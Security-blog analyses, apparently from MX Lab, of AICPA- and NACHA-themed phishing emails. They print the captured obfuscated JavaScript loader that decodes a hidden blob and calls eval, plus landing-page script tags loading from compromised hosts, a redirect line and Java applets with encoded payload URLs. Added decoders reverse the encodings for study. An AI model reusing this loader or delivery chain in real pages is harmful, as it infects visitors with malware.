Emails regarding accountant license from AICPA lead to site with obfuscated JavaScript exploit


MX Lab, http://www.mxlab.eu, is noticing emails claiming that the recipient's accountant license from AICPA will be revoked due to tax return fraud accusations.

The emails have subjects like:

Fraudulant tax return assistance accusations.
Income tax fraud accusations.
Income tax return fraud accusations.
Tax return fraud accusations.
Your accountant license can be revoked.
Your accountant CPA license termination.
….

The emails are sent from spoofed addresses like admin@aicpa.org, alerts@aicpa.org, risk@aicpa.org, info@aicpa.org, service@aicpa.org, risk.manager@aicpa.org, support@aicpa.org, …. and have the following body:

Dear accountant officer,

We have been informed of your recent assistance in tax return fraud on behalf of one of your clients. According to AICPA Bylaw Subsection 765 your Certified Public Accountant status can be revoked in case of the act of filing of an incorrect or fraudulent tax return for your client or employer.

Please find the complaint below and provide your feedback to it within 7 days. The failure to do so within this term will result in cancellation of your Accountant status.

Here is an example of the message:

The message contains a link labelled “Complant.pdf” that leads to a web host where an HTML page is served with obfuscated JavaScript behind it.

The obfuscated JavaScript contains code to open an iframe:

When I tried to access this page directly I got the following on my screen:

When viewing the HTML source we found the following additional code:

<html><body><div style="display:none;"><p>@wpgtp@^p^@pg^p@tpgwp^opop^^p^2pg3p
^op@tp-2p-3pzwp@^p@tpgwp^op@tp^2p20pzwpg2p^p20p3wpggp@tp@@p^3p@tp-z0p^^p@@pg3p
^op-z0p^0p@@pgzp@tp-z0pg3p^3p-z0pggpgtp@@p@wpg3pgwpgzpopopopzwp@pg2p^p20pzwp@p
@^p@tpgwp^op@tp^2p20pzwpg2p^2p20p-3p-zpz^pg0p^@pgwp@^p^opg3pgtpgwp-z0p@tpgwp@wp
@3p^2p@tp@wpg3p^2p@tp@^p^op-2p-zpwzpw3p^gp@@p^2p-
......
......SHORTENED VERSION OF THE CODE.....
......
zpz^</p></div><script>
ss='s';g='g';r='r';
try{new window(123).asd;}catch(qq){aa=/s/g.exec("a"+"sd").index+[];e=eval;}
aaa=1+[];
i=0;
try{new window(123).qwey();}catch(qqq){
if(aaa==aa)
while(1){
	a=document.body.childNodes[i];
	if(a.tagName.toLowerCase() == "div") break;
	i++;
}
a=a.childNodes[0].innerHTML[r+'eplace'](/\^/g,"7")[r+'eplace'](/@/g,"5")
[r+'eplace'](/g/g,"6")[r+'eplace'](/z/g,"1")[r+'eplace'](/w/g,"8")
[r+'eplace'](/t/g,"9")[r+'eplace'](/o/g,"4");}
a=a.split("p");
md='a';
			c=[];
			i=0;
			p=parseInt;
			try{new RegExp("12").exec("41").type+1;}catch(qqq){qq=String;}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){fr="fromChar";}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){fr+="Code";}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){qq=qq[fr];}
if(aaa==aa){
			while(15042>i){
				vv=a[i];
				r2=cc=qq(41+1+p(vv));
				r=c;
				if(fr)c=r+r2;
				i=i+1;
			}
			w=e;
			w(c);
}
		</script></body></html>
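The loader above is a simple substitution scheme once the noise is stripped away. Everything before the split on "p" is anti-analysis: new window(123) and new RegExp("12").exec("41").type both throw a TypeError in a real browser, and only the catch blocks assign e=eval and assemble String.fromCharCode from the pieces "fromChar" and "Code", so an emulator that does not raise those errors never reaches the eval. The decoding itself is the chain of replace() calls (^ to 7, @ to 5, g to 6, z to 1, w to 8, t to 9, o to 4), a split on "p", parseInt, plus 42, fromCharCode. The decoder below is an added example, not code from the MX Lab post; it reproduces that transformation but returns the decoded script instead of evaluating it. It runs over the five lines of the blob that the post reproduces (the post shortens the rest; the loop bound 15042 in the loader is the token count of the full payload). The decoded prefix writes a "Please wait page is loading..." banner and begins defining a function; the iframe code the post mentions is in the omitted part.

```javascript
// Added example, not code from the MX Lab post: a stand-alone decoder for the
// loader's payload. It reproduces the transformation the script applies
// (letter-to-digit substitution, split on "p", parseInt, add 42,
// String.fromCharCode) but returns the decoded script instead of eval'ing it.

// Substitution table, taken from the chained replace() calls in the loader.
const SUBST = { "^": "7", "@": "5", "g": "6", "z": "1", "w": "8", "t": "9", "o": "4" };

// The opening lines of the hidden <p> blob exactly as the post reproduces
// them (the post shortens the rest; the loop bound 15042 in the loader is the
// token count of the full payload). The trailing "-" is where the post cuts.
const BLOB_PREFIX =
  "@wpgtp@^p^@pg^p@tpgwp^opop^^p^2pg3p" +
  "^op@tp-2p-3pzwp@^p@tpgwp^op@tp^2p20pzwpg2p^p20p3wpggp@tp@@p^3p@tp-z0p^^p@@pg3p" +
  "^op-z0p^0p@@pgzp@tp-z0pg3p^3p-z0pggpgtp@@p@wpg3pgwpgzpopopopzwp@pg2p^p20pzwp@p" +
  "@^p@tpgwp^op@tp^2p20pzwpg2p^2p20p-3p-zpz^pg0p^@pgwp@^p^opg3pgtpgwp-z0p@tpgwp@wp" +
  "@3p^2p@tp@wpg3p^2p@tp@^p^op-2p-zpwzpw3p^gp@@p^2p-";

// Constructed wrapper page with the same layout as the captured one: the blob
// sits in a hidden <div><p>, the loader in a <script> after it.
const SAMPLE_HTML =
  '<html><body><div style="display:none;"><p>' + BLOB_PREFIX + '</p></div>' +
  '<script>/* loader omitted */</script></body></html>';

// The loader walks document.body.childNodes to the first <div> and reads the
// innerHTML of its first child; a regex does the same on a saved page.
function extractBlob(html) {
  const m = /<div[^>]*display:\s*none[^>]*>\s*<p>([\s\S]*?)<\/p>/i.exec(html);
  return m ? m[1].replace(/\s+/g, "") : null;
}

function decodeBlob(blob) {
  // One pass is equivalent to the loader's seven replace() calls: every
  // replacement yields a digit, and digits are never replaced.
  const digits = blob.replace(/[\^@gzwto]/g, (ch) => SUBST[ch]);
  let out = "";
  for (const tok of digits.split("p")) {
    const n = parseInt(tok, 10);            // negative tokens encode codes < 42
    if (Number.isNaN(n)) continue;          // the loader would emit a NUL here
    out += String.fromCharCode(n + 42);     // qq(41+1+p(vv)) in the loader
  }
  return out;
}

// Whole pipeline: page in, decoded (not executed) script out.
function decodeLandingPage(html) {
  const blob = extractBlob(html);
  return blob === null ? null : decodeBlob(blob);
}

console.log(decodeLandingPage(SAMPLE_HTML));
// document.write('<center><h1>Please wait page is loading...</h1></center><hr>');function end_redirect(){}var
```

Run it with node. decodeLandingPage() takes the whole HTML, so the same pipeline works on a saved copy of a landing page. Unparsable tokens (the cut-off "-", or an empty token) are skipped; in the original loader parseInt() would return NaN there and String.fromCharCode would emit a NUL character.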

Recommended action when you receive this type of message: delete it and do not click any of the embedded URLs, neither the “View it in your browser” link at the top, nor the Complaint.pdf link, nor the links at the end of the message.

Emails regarding rejected ACH payment contain a security risk


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with subjects like:

Rejected ACH transaction
Rejected ACH payment
Your ACH transfer

The emails are sent from spoofed addresses like:

"\"The Electronic Payments Association\" risk.manager"@nacha.org
"\"The Electronic Payments Association\" alerts"@nacha.org
"\"The Electronic Payments Association\" risk"@nacha.org
"\"The Electronic Payments Association\" transfers"@nacha.org
"\"The Electronic Payments Association\" ach"@nacha.org
"\"The Electronic Payments Association\" payment"@nacha.org

The email has the following body:

The ACH transaction (ID: 02710822288793), recently sent from your checking account (by you or any other person), was rejected by the Electronic Payments Association.

Canceled transaction
Transaction ID: 02710822288793
Reason for rejection See details in the report below
Transaction Report report_02710822288793.doc (Microsoft Word Document)

13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171

2011 NACHA – The Electronic Payments Association

A sample of the email:

The URL behind the transaction report differs from email to email, and in some cases it is no longer valid. Some examples:

hxxp://minalimo.com/f9oYYmiY/index.html
hxxp://maerlipinte.ch/LaV4inWa/index.html
hxxp://hotel-sicily.it/aRpcdCjd/index.html

One of the URLs did give us a result: hxxp://ftp.samisalami.com/8KQZuSAy/index.html.

When investigating the HTML code of this web page we got the following:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="hxxp://firstnamestore.com/utn08WYD/js.js"></script>
<script type="text/javascript" src="hxxp://ftp.adamsmarketing.com/VRssE3iH/js.js"></script>
<script type="text/javascript" src="hxxp://mediapoolstarnberg.de/WrqeCaoy/js.js"></script>
<script type="text/javascript" src="hxxp://paolomisirochi.com/nqrmZKRC/js.js"></script>
<script type="text/javascript" src="hxxp://lonnytyler.com/MZF0uXsc/js.js"></script>
<script type="text/javascript" src="hxxp://orquestrachapo.com/jAmCDzeM/js.js"></script>

</html>

As you can see, several external JavaScript files are loaded when this page opens. Some of the js.js URLs are already dead, but the ones still online return the one-liner document.location='hxxp://sulusate.com/forum/index.php?showtopic=997439'; which redirects the browser.

The above URL gives us the web page with the following code:

<body>
<applet code='Verifa.class' archive='rhi.jar' width='24' height='22'>
<param name="dest" value="lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAvlmrs">
</applet>
</body><body>
<applet code='Ooo.class' archive='Ooo.jar' width='24' height='22'>
<param name="dest" value="lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAsfi">
</applet>
</body>

When you open these URLs in a web browser (something we do not recommend even trying) you are redirected to bing.com or another web site, so you will not see this code.

So the JavaScript is obfuscated and .jar files are loaded through applets. The risk is that these Java applets contain malicious code: each applet is handed an encoded dest parameter, which suggests the applet decodes it and fetches something from that location. Ooo.jar is named like an OpenOffice.org component, but a file name says nothing about what the archive actually contains; here it is served by the same page as rhi.jar and is part of the same attack.
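The dest parameter handed to both applets is not random: every character of the value is the corresponding character of a URL shifted up by four code points ("lxxt>" is "http:" shifted by 4), and the shift can be recovered from the known prefix "http" alone. The example below, which is added here and is not code from the MX Lab post or from the applets, does that recovery and decodes both values from the applet markup quoted above. It assumes the applet reverses the same shift at runtime to obtain the URL it contacts; the post does not show the applet's own code. Both values decode to a load.php URL on sulusate.com, the same host the js.js files redirect to, with a showforum value that matches each applet's archive name (rhi.jar with rhino, Ooo.jar with obe).

```javascript
// Added example, not code from the MX Lab post or from the applets: recover
// the character shift applied to the applets' "dest" parameter and decode it.
// Assumption: the applet itself reverses the same shift at runtime to obtain
// the URL it contacts; the post does not show the applet's code.

// Applet markup as quoted in the post, with the dest values left exactly as captured.
const APPLET_PAGE = `<body>
<applet code='Verifa.class' archive='rhi.jar' width='24' height='22'>
<param name="dest" value="lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAvlmrs">
</applet>
</body><body>
<applet code='Ooo.class' archive='Ooo.jar' width='24' height='22'>
<param name="dest" value="lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAsfi">
</applet>
</body>`;

// Known-plaintext recovery of the shift: the target is a URL, so it starts
// with "http"; the distance between the first four characters of the value
// and "http" is the shift. Returns null when the four distances disagree.
function guessShift(value) {
  const known = "http";
  if (value.length < known.length) return null;
  const shift = value.charCodeAt(0) - known.charCodeAt(0);
  for (let i = 1; i < known.length; i++) {
    if (value.charCodeAt(i) - known.charCodeAt(i) !== shift) return null;
  }
  return shift;
}

// Shift every character back; the shift defaults to the recovered one.
function decodeDest(value, shift = guessShift(value)) {
  if (shift === null) throw new Error("value does not look like a shifted http URL");
  return Array.from(value, (ch) => String.fromCharCode(ch.charCodeAt(0) - shift)).join("");
}

// Collect the archive name and dest parameter of every applet on a page.
function extractApplets(html) {
  const re = /<applet[^>]*archive=['"]([^'"]+)['"][^>]*>[\s\S]*?<param\s+name=['"]dest['"]\s+value=['"]([^'"]+)['"]/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push({ archive: m[1], dest: m[2] });
  return out;
}

// Page in, list of { archive, url } out, so the jar and the URL it is paired
// with can be read side by side.
function decodeAppletPage(html) {
  return extractApplets(html).map(({ archive, dest }) => ({ archive, url: decodeDest(dest) }));
}

for (const { archive, url } of decodeAppletPage(APPLET_PAGE)) {
  console.log(archive, "->", url);
}
```

Do not fetch the decoded URLs; as the post notes, the site redirects ordinary visitors elsewhere, and the load.php endpoint is where the applet payload is served. The shift recovery is deliberately conservative: a value whose first four characters do not map to "http" with one consistent offset is rejected rather than decoded into garbage.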

This email is certainly a security risk (malware or a phishing attempt), so do not follow any of its URLs or open any of its files.
